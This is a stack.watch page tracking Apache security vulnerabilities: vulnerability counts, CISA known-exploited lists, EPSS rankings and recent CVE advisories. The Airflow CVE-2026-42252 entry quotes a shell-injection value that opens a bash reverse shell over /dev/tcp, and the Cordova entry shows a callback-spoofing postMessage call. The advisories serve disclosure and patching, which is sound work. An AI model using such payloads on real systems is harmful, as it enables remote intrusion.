Apache The Apache Software Foundation

Don't miss out!

Thousands of developers use stack.watch to stay informed.
Get an email whenever new security vulnerabilities are reported in any Apache product.

RSS Feeds for Apache security vulnerabilities

Create a CVE RSS feed including security vulnerabilities found in Apache products with stack.watch. Just hit watch, then grab your custom RSS feed url.

Products by Apache Sorted by Most Security Vulnerabilities since 2018

Apache HTTP Server307 vulnerabilities

Apache AirFlow176 vulnerabilities

Apache Tomcat176 vulnerabilities
JEE Compliant Servlet Container

Apache Traffic Server73 vulnerabilities

Apache Superset68 vulnerabilities

Apache OFBiz60 vulnerabilities

Apache ActiveMQ56 vulnerabilities

Apache OpenOffice54 vulnerabilities

Apache NiFi46 vulnerabilities

Apache CXF46 vulnerabilities

Apache Solr43 vulnerabilities
Search engine written in java

Apache Camel37 vulnerabilities

Apache Struts37 vulnerabilities

Apache InLong32 vulnerabilities

Apache CloudStack32 vulnerabilities

Apache DolphinScheduler27 vulnerabilities

Apache JSPWiki24 vulnerabilities

Apache Tika24 vulnerabilities

Apache Kafka23 vulnerabilities

Apache Hive23 vulnerabilities

Apache Zeppelin22 vulnerabilities

Apache Openmeetings22 vulnerabilities

Apache Spark21 vulnerabilities

Apache Kylin21 vulnerabilities

Apache Hadoop21 vulnerabilities

Apache Shiro21 vulnerabilities

Apache Plusar20 vulnerabilities

Apache Geode19 vulnerabilities

Apache Fineract19 vulnerabilities

Apache Linkis18 vulnerabilities

Apache Log4j18 vulnerabilities

Apache Thrift18 vulnerabilities

Apache Iotdb18 vulnerabilities

Apache Streampark17 vulnerabilities

Apache Ambari17 vulnerabilities

Apache Answer17 vulnerabilities

Apache Zookeeper17 vulnerabilities

Apache Hertzbeat16 vulnerabilities

Apache Cassandra16 vulnerabilities

Apache Syncope16 vulnerabilities

Apache Activemq Artemis15 vulnerabilities

Apache James15 vulnerabilities

Apache JMeter14 vulnerabilities

Apache Guacamole13 vulnerabilities

Apache Apisix13 vulnerabilities

Apache Druid13 vulnerabilities

Apache Karaf12 vulnerabilities

Apache Archiva12 vulnerabilities

Apache Commons Compress12 vulnerabilities

Apache Subversion12 vulnerabilities

Apache Ozone11 vulnerabilities

Apache Ranger11 vulnerabilities

Apache Batik10 vulnerabilities

Apache Wicket10 vulnerabilities

Apache Couchdb10 vulnerabilities

Apache Storm9 vulnerabilities

Apache Pdfbox9 vulnerabilities

Apache Mina9 vulnerabilities

Apache Mesos9 vulnerabilities

Apache Ignite9 vulnerabilities

Apache Portable Runtime9 vulnerabilities

Apache Roller8 vulnerabilities

Apache Httpclient8 vulnerabilities

Apache Avro8 vulnerabilities

Apache Traffic Control8 vulnerabilities

Apache Drill8 vulnerabilities

Apache Apr Util7 vulnerabilities

Apache Impala7 vulnerabilities

Apache Streampipes7 vulnerabilities

Apache Nuttx6 vulnerabilities

Apache Jena6 vulnerabilities

Apache Allura6 vulnerabilities

Apache Xerces C6 vulnerabilities

Apache Brpc6 vulnerabilities

Apache Commons Configuration6 vulnerabilities

Apache Commons Fileupload6 vulnerabilities

Apache Doris6 vulnerabilities

Apache Seata5 vulnerabilities

Apache Nimble5 vulnerabilities

Apache Submarine5 vulnerabilities

Apache Poi5 vulnerabilities

Apache Arrow5 vulnerabilities

Apache Atlas5 vulnerabilities

Apache Axis5 vulnerabilities

Apache Groovy5 vulnerabilities

Apache Kvrocks4 vulnerabilities

Apache RocketMQ4 vulnerabilities

Recent Apache Security Advisories

Advisory	Title	Published
2.4.68	13 Vulnerabilities Fixed in Apache HTTP Server 2.4.68	June 8, 2026
2.4.67	11 Vulnerabilities Fixed in Apache HTTP Server 2.4.67	May 4, 2026
2.4.66	5 Vulnerabilities Fixed in Apache HTTP Server 2.4.66	December 4, 2025
2.4.65	Vulnerability Fixed in Apache HTTP Server 2.4.65	July 23, 2025
2.4.64	8 Vulnerabilities Fixed in Apache HTTP Server 2.4.64	July 10, 2025
2.4.62	2 Vulnerabilities Fixed in Apache HTTP Server 2.4.62	July 17, 2024
2.4.61	Vulnerability Fixed in Apache HTTP Server 2.4.61	July 16, 2024
2.4.60	8 Vulnerabilities Fixed in Apache HTTP Server 2.4.60	July 15, 2024
2.4.59	3 Vulnerabilities Fixed in Apache HTTP Server 2.4.59	April 4, 2024
2.4.58	4 Vulnerabilities Fixed in Apache HTTP Server 2.4.58	October 19, 2023

Known Exploited Apache Vulnerabilities

The following Apache vulnerabilities have recently been marked by CISA as Known to be Exploited by threat actors.

Title	Description	Added
Apache ActiveMQ Improper Input Validation Vulnerability	Apache ActiveMQ contains an improper input validation vulnerability that allows for code injection. CVE-2026-34197 Exploit Probability: 83.5%	April 16, 2026
Apache HTTP Server Improper Escaping of Output Vulnerability	Apache HTTP Server contains an improper escaping of output vulnerability in mod_rewrite that allows an attacker to map URLs to filesystem locations that are permitted to be served by the server but are not intentionally/directly reachable by any URL, resulting in code execution or source code disclosure. CVE-2024-38475 Exploit Probability: 93.9%	May 1, 2025
Apache Tomcat Path Equivalence Vulnerability	Apache Tomcat contains a path equivalence vulnerability that allows a remote attacker to execute code, disclose information, or inject malicious content via a partial PUT request. CVE-2025-24813 Exploit Probability: 94.1%	April 1, 2025
Apache OFBiz Forced Browsing Vulnerability	Apache OFBiz contains a forced browsing vulnerability that allows a remote attacker to obtain unauthorized access. CVE-2024-45195 Exploit Probability: 94.1%	February 4, 2025
Apache HugeGraph-Server Improper Access Control Vulnerability	Apache HugeGraph-Server contains an improper access control vulnerability that could allow a remote attacker to execute arbitrary code. CVE-2024-27348 Exploit Probability: 94.3%	September 18, 2024
Apache OFBiz Incorrect Authorization Vulnerability	Apache OFBiz contains an incorrect authorization vulnerability that could allow remote code execution via a Groovy payload in the context of the OFBiz user process by an unauthenticated attacker. CVE-2024-38856 Exploit Probability: 94.4%	August 27, 2024
Apache OFBiz Path Traversal Vulnerability	Apache OFBiz contains a path traversal vulnerability that could allow for remote code execution. CVE-2024-32113 Exploit Probability: 94.0%	August 7, 2024
Apache Flink Improper Access Control Vulnerability	Apache Flink contains an improper access control vulnerability that allows an attacker to read any file on the local filesystem of the JobManager through its REST interface. CVE-2020-17519 Exploit Probability: 94.3%	May 23, 2024
Apache Superset Insecure Default Initialization of Resource Vulnerability	Apache Superset contains an insecure default initialization of a resource vulnerability that allows an attacker to authenticate and access unauthorized resources on installations that have not altered the default configured SECRET_KEY according to installation instructions. CVE-2023-27524 Exploit Probability: 84.0%	January 8, 2024
Apache ActiveMQ Deserialization of Untrusted Data Vulnerability	Apache ActiveMQ contains a deserialization of untrusted data vulnerability that may allow a remote attacker with network access to a broker to run shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath. CVE-2023-46604 Exploit Probability: 94.4%	November 2, 2023
Apache RocketMQ Command Execution Vulnerability	Several components of Apache RocketMQ, including NameServer, Broker, and Controller, are exposed to the extranet and lack permission verification. An attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as or achieve the same effect by forging the RocketMQ protocol content. CVE-2023-33246 Exploit Probability: 94.4%	September 6, 2023
Apache Tomcat Remote Code Execution Vulnerability	Apache Tomcat contains an unspecified vulnerability that allows for remote code execution if JmxRemoteLifecycleListener is used and an attacker can reach Java Management Extension (JMX) ports. This CVE exists because this listener wasn't updated for consistency with the Oracle patched issues for CVE-2016-3427 which affected credential types. CVE-2016-8735 Exploit Probability: 93.8%	May 12, 2023
Apache Log4j2 Deserialization of Untrusted Data Vulnerability	Apache Log4j2 contains a deserialization of untrusted data vulnerability due to the incomplete fix of CVE-2021-44228, where the Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations. CVE-2021-45046 Exploit Probability: 94.3%	May 1, 2023
Apache Spark Command Injection Vulnerability	Apache Spark contains a command injection vulnerability via Spark User Interface (UI) when Access Control Lists (ACLs) are enabled. CVE-2022-33891 Exploit Probability: 93.5%	March 7, 2023
Apache APISIX Authentication Bypass Vulnerability	Apache APISIX contains an authentication bypass vulnerability that allows for remote code execution. CVE-2022-24112 Exploit Probability: 94.4%	August 25, 2022
Apache CouchDB Insecure Default Initialization of Resource Vulnerability	Apache CouchDB contains an insecure default initialization of resource vulnerability which can allow an attacker to escalate to administrative privileges. CVE-2022-24706 Exploit Probability: 94.4%	August 25, 2022
Apache Kylin OS Command Injection Vulnerability	Apache Kylin contains an OS command injection vulnerability which could permit an attacker to perform remote code execution. CVE-2020-1956 Exploit Probability: 93.7%	March 25, 2022
Apache Struts Improper Input Validation Vulnerability	Apache Struts allows remote attackers to execute arbitrary Object-Graph Navigation Language (OGNL) expressions. CVE-2013-2251 Exploit Probability: 94.3%	March 25, 2022
Apache Tomcat on Windows Remote Code Execution Vulnerability	When running Apache Tomcat on Windows with HTTP PUTs enabled, it is possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server. CVE-2017-12615 Exploit Probability: 94.2%	March 25, 2022
Apache Tomcat Remote Code Execution Vulnerability	When running Apache Tomcat, it is possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server. CVE-2017-12617 Exploit Probability: 94.4%	March 25, 2022

Of the known exploited vulnerabilities above, 20 are in the top 1%, or the 99th percentile of the EPSS exploit probability rankings.

Top 10 Riskiest Apache Vulnerabilities

Based on the current exploit probability, these Apache vulnerabilities are on CISA's Known Exploited vulnerabilities list (KEV) and are ranked by the current EPSS exploit probability.

Rank	CVE	EPSS	Vulnerability
1	CVE-2019-17558	94.5%	Apache Solr 5.0.0-8.3.1 Remote Code Execution Vulnerability
2	CVE-2020-1938	94.5%	Apache Tomcat Improper Privilege Management Vulnerability
3	CVE-2022-24112	94.4%	Apache APISIX Authentication Bypass Vulnerability
4	CVE-2023-46604	94.4%	Apache ActiveMQ Deserialization of Untrusted Data Vulnerability
5	CVE-2021-40438	94.4%	Apache HTTP Server-Side Request Forgery (SSRF)
6	CVE-2018-11776	94.4%	Apache Struts 2.3 to 2.3.34 and 2.5 to 2.5.16 Remote Code Execution Vulnerability
7	CVE-2021-42013	94.4%	Apache HTTP Server 2.4.49 and 2.4.50 Path Traversal
8	CVE-2021-41773	94.4%	Apache HTTP Server Path Traversal Vulnerability
9	CVE-2023-33246	94.4%	Apache RocketMQ Command Execution Vulnerability
10	CVE-2022-24706	94.4%	Apache CouchDB Insecure Default Initialization of Resource Vulnerability

By the Year

In 2026 there have been 293 vulnerabilities in Apache with an average score of 7.2 out of ten. Last year, in 2025 Apache had 229 security vulnerabilities published. That is, 64 more vulnerabilities have already been reported in 2026 as compared to last year. Last year, the average CVE base score was greater by 0.06

Year	Vulnerabilities	Average Score
2026	293	7.22
2025	229	7.29
2024	275	7.45
2023	274	7.47
2022	228	7.63
2021	212	7.61
2020	160	7.56
2019	163	7.37
2018	155	7.24

It may take a day or so for new Apache vulnerabilities to show up in the stats or in the list of recent security vulnerabilities. Additionally vulnerabilities may be tagged under a different product or component name.

Recent Apache Security Vulnerabilities

CVE	Date	Vulnerability	Products
CVE-2026-49818	Jun 09, 2026	Apache Airflow Samba Prov: Path Traversal via GCSToSambaOperator v<4.12.6 The Apache Airflow Samba provider's `GCSToSambaOperator` joined GCS object names to the SMB destination path without a containment check, so an object named with `../` segments resolved a write path outside the configured `destination_path`. An attacker able to write objects into the source GCS bucket typically an external data producer distinct from the trusted DAG author could write files to arbitrary locations on the Samba target when the operator ran. Upgrade apache-airflow-providers-samba to 4.12.6 or later, which validates the resolved destination stays within `destination_path`.	AirFlow
CVE-2026-34905	Jun 09, 2026	Apache Answer 2.0.0 Unrestricted Unlisted Questions API Disclosure Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Answer. This issue affects Apache Answer: through 2.0.0. The unlisted question feature did not enforce access restrictions on direct API endpoints, allowing authenticated users to discover and access unlisted questions, their answers, comments, and revision history. Users are recommended to upgrade to version 2.0.1, which fixes the issue.	Answer
CVE-2026-34033	Jun 09, 2026	Apache Answer 2.0.0 XSS via Unescaped HTML in Email Notifications Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Apache Answer. This issue affects Apache Answer: through 2.0.0. User-supplied content was included in notification emails without proper escaping, allowing authenticated users to inject arbitrary HTML into emails sent to other users. Users are recommended to upgrade to version 2.0.1, which fixes the issue.	Answer
CVE-2026-34031	Jun 09, 2026	Apache Answer 2.0.0 Unrestricted Upld of External Image URL Unrestricted Upload of File with Dangerous Type vulnerability in Apache Answer. This issue affects Apache Answer: through 2.0.0. The server did not sufficiently validate user-supplied image URLs, allowing arbitrary external content to be embedded as profile images, which could expose users to unintended external requests and tracking by third-party servers. Users are recommended to upgrade to version 2.0.1, which fixes the issue.	Answer
CVE-2026-33582	Jun 09, 2026	Apache Answer 2.0.0 Unrestricted Upload CVE-2026-33582 Unrestricted Upload of File with Dangerous Type vulnerability in Apache Answer. This issue affects Apache Answer: through 2.0.0. A crafted TIFF image could trigger excessive memory allocation during image decoding, allowing an authenticated user to cause the server process to crash. Users are recommended to upgrade to version 2.0.1, which fixes the issue.	Answer
CVE-2026-25699	Jun 09, 2026	Apache Answer <2.0.0 Privileged Data Leak via Timeline API Exposure of Private Personal Information to an Unauthorized Actor vulnerability in Apache Answer. This issue affects Apache Answer: through 2.0.0. Timeline-related APIs lacked proper authorization checks, allowing regular authenticated users to access deleted, private, or unapproved content and its revision history. Users are recommended to upgrade to version 2.0.1, which fixes the issue.	Answer
CVE-2026-25688	Jun 09, 2026	Apache Answer XSS: Invalid Neutralization of Alternate Syntax, Fixed in 2.0.1 Improper Neutralization of Alternate XSS Syntax vulnerability in Apache Answer. This issue affects Apache Answer: through 2.0.0. AI-generated response content was rendered in the browser without proper sanitization, allowing malicious scripts to be executed when the content was viewed. Users are recommended to upgrade to version 2.0.1, which fixes the issue.	Answer
CVE-2026-49975	Jun 08, 2026	Apache HTTP Server mod_http DoS via Excessive Memory Allocation (2.4.17-2.4.67) Memory Allocation with Excessive Size Value vulnerability in Apache HTTP Server's mod_http leads to denial of service via malicious HTTP requests. This issue affects Apache HTTP Server: from 2.4.17 through 2.4.67.	HTTP Server
CVE-2026-48913	Jun 08, 2026	Apache HTTP Server 2.4.55-2.4.67 Mod_http2 Use-After-Free Exhausted Handles Use After Free vulnerability in Apache HTTP Server module mod_http2 when file handles are already exhausted. This issue affects Apache HTTP Server: from 2.4.55 through 2.4.67.	HTTP Server
CVE-2026-42536	Jun 08, 2026	Heap Overflow in mod_xml2enc of Apache HTTP Svr 2.4.02.4.672.4.68 Heap-based Buffer Overflow vulnerability in Apache HTTP Server with mod_xml2enc, xml2StartParse, and untrusted content This issue affects Apache HTTP Server: from 2.4.0 through 2.4.67. Users are recommended to upgrade to version 2.4.68, which fixes the issue.	HTTP Server
CVE-2026-44185	Jun 08, 2026	Apache HTTP Server 2.4.0-2.4.67 OCSP Outbound Buffer Over-read Buffer Over-read vulnerability in Apache HTTP Server via outbound OCSP requests to an attacker controlled OCSP server This issue affects Apache HTTP Server: from 2.4.0 through 2.4.67. Users are recommended to upgrade to version 2.4.68, which fixes the issue.	HTTP Server
CVE-2026-34355	Jun 08, 2026	Apache HTTP Server 2.4.67 mod_proxy_html Buffer Overflow CVE-2026-34355 A buffer overflow in mod_proxy_html in Apache HTTP Server 2.4.67 and earlier allows an attack by an untrusted backend. Users are recommended to upgrade to version 2.4.68, which fixes this issue.	HTTP Server
CVE-2026-44631	Jun 08, 2026	Apache HTTP Server 2.4.0-2.4.67 Buffer Underwrite via Regex Buffer Underwrite vulnerability in Apache HTTP Server on crafted regular expressions in the configuration. This issue affects Apache HTTP Server: from 2.4.0 through 2.4.67. Users are recommended to upgrade to version 2.4.68, which fixes the issue.	HTTP Server
CVE-2026-44119	Jun 08, 2026	Apache HTTP Server 2.4.67 Improper Privilege Mng in .htaccess (Fixed 2.4.68) Improper Privilege Management vulnerability in Apache HTTP Server 2.4.67 and earlier allows local .htaccess authors to read files with the privileges of the httpd user. This issue affects Apache HTTP Server: from through 2.4.67. Users are recommended to upgrade to version 2.4.68, which fixes the issue.	HTTP Server
CVE-2026-43951	Jun 08, 2026	Apache HTTP Server <= 2.4.67: OOB Read in mod_headers/mod_mime Out-of-bounds Read vulnerability in Apache HTTP Server with mod_headers and mod_mime and multiple response languages. This issue affects Apache HTTP Server: from 2.4.0 through 2.4.67.	HTTP Server
CVE-2026-42535	Jun 08, 2026	Apache 2.4.68 - Path Handling Vulnerability in mod_dav_fs (CVE-2026-42535) A path handling issue in mod_dav_fs in Apache 2.4.67 and earlier allows a WebDAV content author to directly manipulate trusted DAV property databases, potentially causing child process crashes. Users are recommended to upgrade to version 2.4.68, which fixes this issue.	HTTP Server
CVE-2026-34356	Jun 08, 2026	Apache HTTP Server 2.4.0-2.4.67 Heap Buffer Overflow via ProxyPassReverseCookie Heap-based Buffer Overflow vulnerability in Apache HTTP Server with malicious backend servers and ProxyPassReverseCookie* This issue affects Apache HTTP Server: from 2.4.0 through 2.4.67. Users are recommended to upgrade to version 2.4.68, which fixes the issue.	HTTP Server
CVE-2026-44186	Jun 08, 2026	Apache HTTP 2.4.x mod_proxy_ftp Infinite Loop (before 2.4.68) Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in the mod_proxy_ftp module in Apache HTTP Server with an attacker controlled backend FTP server. This issue affects undefined: from 2.4.0 through 2.4.67. Users are recommended to upgrade to version 2.4.68, which fixes the issue.	HTTP Server
CVE-2026-29170	Jun 08, 2026	Apache HTTP Server 2.4.67 XSS in mod_proxy_ftp Dir List Generation A cross-site scripting vulnerability exists in mod_proxy_ftp's HTML directory list generation in Apache HTTP Server 2.4.67 and earlier when listing FTP directory contents either via forward or reverse proxy configuration. Users are recommended to upgrade to version 2.4.68, which fixes this issue.	HTTP Server
CVE-2026-29167	Jun 08, 2026	Apache HTTP 2.4.02.4.67 Use-After-Free mod_ldap (per-dir) fixed in 2.4.68 Use After Free vulnerability in Apache HTTP Server with mod_ldap in per-directory configuration This issue affects Apache HTTP Server: from 2.4.0 through 2.4.67. Users are recommended to upgrade to version 2.4.68, which fixes the issue.	HTTP Server
CVE-2026-47430	Jun 08, 2026	iOS Cordova InAppBrowser 3.x6.0.0 Remote Callback Injection ## Summary The iOS implementation of `cordova-plugin-inappbrowser` passes the `id` field from a `WKScriptMessage` body to `commandDelegate sendPluginResult:callbackId:` with no format validation (`CDVWKInAppBrowser.m:560574`). Any web content loaded inside the InAppBrowser can fire any pending Cordova callback in the host app by posting a message whose `id` field is a guessable or enumerated callback identifier. An attack abusing this weakness must be tailored to the specific plugins and callback IDs the host app uses. Though an attacker with knowledge of common Cordova plugin configurations could craft reusable payloads targeting widely-adopted plugins. ## Impact An unauthenticated remote attacker who controls content displayed in the InAppBrowser via a URL the app opens (OAuth redirect, marketing link, deep-link target) or a network interception can call `window.webkit.messageHandlers.cordova_iab.postMessage({id: '<victim-callback-id>', d: '...'})` to fire callbacks belonging to any other installed Cordova plugin (Camera, Contacts, File, Geolocation). Cordova callback IDs follow the predictable format `<PluginName><sequential-integer>`, making enumeration feasible. Successful exploitation allows the attacker to spoof plugin results across trust boundaries for example, injecting a forged camera approval, a fabricated contacts list, or a crafted file-read response. This issue affects Cordova Plugin InAppBrowser: from 3.1.0 through 6.0.0. Users are recommended to upgrade to version 6.0.1, which fixes the issue.
CVE-2026-50076	Jun 04, 2026	Apache Fory-core Java SDK <1.1.0: Deserialization of Untrusted Data Deserialization of Untrusted Data in the Java replace-resolve path in Apache Fory fory-core Java SDK before 1.1.0 on Java/JVM platforms allows a remote attacker to bypass class registration, TypeChecker, and DisallowedList checks and invoke classpath-present readResolve/readExternal hooks via crafted Fory serialized data. Users are recommended to upgrade to version 1.1.0 or later, which fixes this issue.	Fory
CVE-2026-47065	Jun 03, 2026	Java Deserialization Proxy Class Bypass (resolveProxyClass Not Overridden) ZDRES-232: resolveProxyClass Not Overridden - acceptMatchers Filter Bypass via java.lang.reflect.Proxy Assessment: Fully addressed. When the serialised stream contains a TC_PROXYCLASSDESC (the marker for a java.lang.reflect.Proxy ), JDKs ObjectInputStream.readProxyDesc() is dispatched. JDK then calls the default ObjectInputStream.resolveProxyClass(interfaces) implementation, which performs Class.forName(intf, false, latestUserDefinedLoader()) for EACH interface name and constructs the proxy class â bypassing the accepted classes list . ZDRES-233: Class.forName(name, initialize=true, classLoader) in readClassDescriptor Triggers Static Initialiser of Allow-Listed Classes Assessment: Fully addressed. For ANY class on the allow-list, deserialising a stream that names it triggers the classs (static initialiser) BEFORE any instance is constructed. This means an attacker who supplies a class name on the allow-list (e.g., the developer wrote accept(com.myapp.*") , attacker supplies com.myapp.SomeClass ) causes <clinit> of SomeClass â and many real-world classes have side-effecting static initialisers Both issues have been fixed.	Mina
CVE-2026-46718	Jun 02, 2026	Apache Calcite <1.42 Unsafe Reflection via External Input Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') vulnerability in Apache Calcite. This issue affects Apache Calcite: from 1.5.0 before 1.42. Users are recommended to upgrade to version 1.42, which fixes the issue.	Calcite
CVE-2026-41115	Jun 02, 2026	Apache Kafka Improper Auth: CONSUMER_GROUP_DESCRIBE API Mis-ACL An improper authorization vulnerability has been identified in Apache Kafka. The implementation of the CONSUMER_GROUP_DESCRIBE (69) API validates the DESCRIBE operation on the GROUP resource instead of the READ operation that documented in the official kafka documentation and the KIP-848. This discrepancy can result in misconfigured Access Control Lists (ACLs) and unintended security postures, like granting READ permission to users who should not be able to join/sync groups, or allowing users without READ permission (but with DESCRIBE permission) to access sensitive group metadata. The correct permission for CONSUMER_GROUP_DESCRIBE API is DESCRIBE GROUP so the current implementation is correct. However, the kafka documentation as well as the KIP-848 will be updated to reflect the correct permission. We advise the Kafka users to review existing group ACLs to ensure the principle of least privilege.	Kafka
CVE-2026-49328	Jun 01, 2026	SSRF in apache fesod-sheet UrlImageConverter before v2.0.2-incubating Server-Side Request Forgery (SSRF) in the UrlImageConverter component of Apache Fesod (Incubating) fesod-sheet before 2.0.2-incubating allows attackers to cause outbound network requests to internal or otherwise restricted resources via a user-supplied image URL. Users are recommended to upgrade to version 2.0.2-incubating, which fixes this issue.
CVE-2026-48827	Jun 01, 2026	Apache MINA SSHD sshdgit Path Traversal via Git Operations (2.18.0) Path traversal vulnerability in Apache MINA SSHD bundle sshd-git. Lack of path validation in git-upload-pack, git-receive-pack, and other git operations allows users authenticated over SSH access to git repositories outside the configured git server root directory. Applications are affected if they use org.apache.sshd:sshd-git. Applications not using sshd-git are not affected. Users are advised to upgrade affected applications to Apche MINA SSHD 2.18.0, which fixes the issue. The issue also is present in the pre-release milestones 3.0.0-M1 to 3.0.0-M3 for a new upcoming new major version 3.0.0. Again, applications are affected only if they use sshd-git. Upgrade affected applications to 3.0.0-M4. We would like to point out that a professional git server should not rely solely on file system layout and permissions, but should implement additional security controls to govern access to git repositories and operations allowed on particular git repositories.	Mina Sshd
CVE-2026-44825	Jun 01, 2026	Apache Solr 9.4.0-9.10.1 Hardcoded BasicAuth Credentials via bin/solr auth enable Hardcoded credentials in the Basic Authentication setup tool (bin/solr auth enable) in Apache Solr versions 9.4.0 through 9.10.1 and 10.0.0 allows a remote attacker to gain full administrative access to the cluster via publicly known default credentials installed silently alongside the user-specified account. As an immediate workaround without upgrading, delete the template users (superadmin, admin, search, index) from security.json or change their passwords. The future, not yet released, versions 9.11.0 and 10.1.0 will not be vulnerable, and it will be enough to upgrade to solve the issue. Not affected: * Clusters where bin/solr auth enable was not used to bootstrap BasicAuth * Clusters where template users have been assigned strong passwords after bootstrap	Solr
CVE-2026-49361	Jun 01, 2026	Apache Fluss 0.9.1: Prevent DDOS via Netty frmDec MAX_LENGTH Apache Fluss versions prior to 0.9.1 configure the Netty LengthFieldBasedFrameDecoder with Integer.MAX_VALUE as the maximum frame length, allowing unauthenticated remote attackers to exhaust JVM heap memory on TabletServer and CoordinatorServer by sending specially crafted frame headers, resulting in denial of service. This issue affects Apache Fluss (incubating): 0.8.0 and 0.9.0. Users are recommended to upgrade to version 0.9.1, which fixes the issue.
CVE-2026-40861	Jun 01, 2026	Apache Airflow <3.2.2: Log Path Traversal via FileTaskHandler A Dag author could either (a) create a symlink under their task's log directory pointing to an arbitrary file readable by the API server process (read-path attack e.g. `/etc/passwd` or `airflow.cfg`) or (b) supply a `task_id` containing `..` sequences accepted by the Task SDK's `KEY_REGEX` (write-path attack), and in both cases the FileTaskHandler resolves the log path outside the configured `base_log_folder`, leaking or overwriting arbitrary files. Only affects deployments where the worker log folder is shared with the API server. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. As a defense-in-depth mitigation, deploy the worker and API server with separate log volumes so that worker-controlled paths cannot reach the API server's filesystem.	AirFlow
CVE-2026-40961	Jun 01, 2026	Apache Airflow 3.2 Redirect Vulnerability in login route (bypass is_safe_url) A bug in the login redirect route in Apache Airflow allowed authenticated users to craft URLs that bypassed the `is_safe_url` check, enabling redirection from a trusted Airflow domain to an attacker-controlled origin. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. As a defense-in-depth mitigation, deployment operators can place Airflow behind a reverse proxy that strips off-domain `next=` query parameters before they reach the login endpoint.	AirFlow
CVE-2026-40963	Jun 01, 2026	Airflow UI structure_data Endpoint Exposes Linked Dag Info (before 3.2.2) The structure_data endpoint in the Airflow UI returned external dependency graph nodes for linked Dags without checking whether the caller had read permission on those linked Dags. An authenticated UI/API user authorized for one Dag could enumerate linked Dag IDs and dependency metadata for other Dags they were not authorized to read. Affects deployments that rely on per-Dag read scoping to keep Dag dependency topology private across teams. Users are advised to upgrade to `apache-airflow` 3.2.2 or later.	AirFlow
CVE-2026-41014	Jun 01, 2026	Apache Airflow 3.2.2 - Partitioned_Dag_Runs Asset-Level Access Bypass The partitioned_dag_runs endpoints in the Airflow UI enforced only asset-level access control, not per-Dag authorization. An authenticated UI/API user with global Asset:read permission could enumerate partition run state, schedule configuration, and asset wiring for Dags they were not authorized to read. Affects deployments that rely on per-Dag read scoping while granting users broader Asset access. Users are advised to upgrade to `apache-airflow` 3.2.2 or later.	AirFlow
CVE-2026-49267	Jun 01, 2026	Apache Airflow SMTP STARTTLS Cert Bypass before 3.2.2 Apache Airflow's EmailOperator and the underlying `airflow.utils.email` helpers established SMTP STARTTLS connections without verifying the remote certificate when the deployment used `[email] smtp_starttls=True` without `[email] smtp_ssl`. An attacker positioned between the worker and the configured SMTP server (network MITM typical hostile-network attack-surface for environments where the SMTP relay sits outside the worker's trust boundary) could present a self-signed certificate, have the worker complete the STARTTLS handshake silently, and capture the SMTP AUTH credentials and message contents the worker forwarded. This CVE covers the core apache-airflow side of the same root cause already covered for the SMTP provider by `CVE-2026-41016` (published 2026-04-27, covering `apache-airflow-providers-smtp`). Users who already applied the SMTP-provider fix from CVE-2026-41016 should additionally upgrade `apache-airflow` to 3.2.2 or later to cover the core-side path through `airflow.utils.email`. Affects deployments configured with `smtp_starttls=True` and `smtp_ssl=False` where the SMTP relay is reachable across a less-trusted network segment than the worker. Users are advised to upgrade to `apache-airflow` 3.2.2 or later.	AirFlow
CVE-2026-41017	Jun 01, 2026	Apache Airflow JWTRefreshMiddleware insecure cookie (no Secure flag) 3.2.x Apache Airflow's `JWTRefreshMiddleware` set the JWT auth cookie without the `Secure` flag, so deployments running the Airflow API server behind an HTTPS-terminating reverse proxy (e.g. nginx / Envoy / a managed load balancer that terminates TLS and forwards plaintext to the API server, the default cloud-native topology) would have the user's session JWT replayed over any cleartext HTTP request to the same host. A network-positioned attacker (Wi-Fi MITM, hostile LAN, captive-portal proxy) could induce a logged-in user's browser to issue an HTTP request to the deployment's hostname and capture the JWT cookie out of that request, then replay it against the authenticated API. Affects deployments where the Airflow API server is reached through a TLS-terminating proxy and the cookie's secure-by-default protection is load-bearing for session integrity. Users are advised to upgrade to `apache-airflow` 3.2.2 or later.	AirFlow
CVE-2026-41084	Jun 01, 2026	Apache Airflow Bulk Task Instances API Auth Bypass (<=3.2.1) A bug in Apache Airflow's bulk Task Instances API (`PATCH/DELETE /api/v2/dags/{dag_id}/dagRuns/{dag_run_id}/taskInstances`) evaluated authorization against the `dag_id` resolved from the URL path while operating on the `dag_id` / `dag_run_id` extracted from request-body entity fields. An authenticated UI/API user with edit permission on one Dag could mutate Task Instance state in any other Dag by keeping the authorized Dag's ID in the URL path and naming the target Dag's IDs in the request body entities. Affects deployments that rely on per-Dag edit-scope to keep Task Instance state isolated between teams. Users are advised to upgrade to `apache-airflow` 3.2.2 or later.	AirFlow
CVE-2026-42252	Jun 01, 2026	Apache Airflow 3.2.2 Shell Injection via Unquoted DAG Run Conf in BashOperator Apache Airflow's official documentation at `core-concepts/dag-run.html` ("Passing Parameters when triggering Dags") showed a verbatim `BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}")` example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had `Dag.can_trigger` permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the `conf` field of the trigger API: an authenticated trigger user could supply `"; bash -i >& /dev/tcp/.../9999 0>&1; #"` as a `conf` value and reach an `os.exec` on the worker. This CVE covers the documentation correction in `apache/airflow` PR 64129 the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to `apache-airflow` 3.2.2 or later to pick up the corrected documentation shipped with the release.	AirFlow
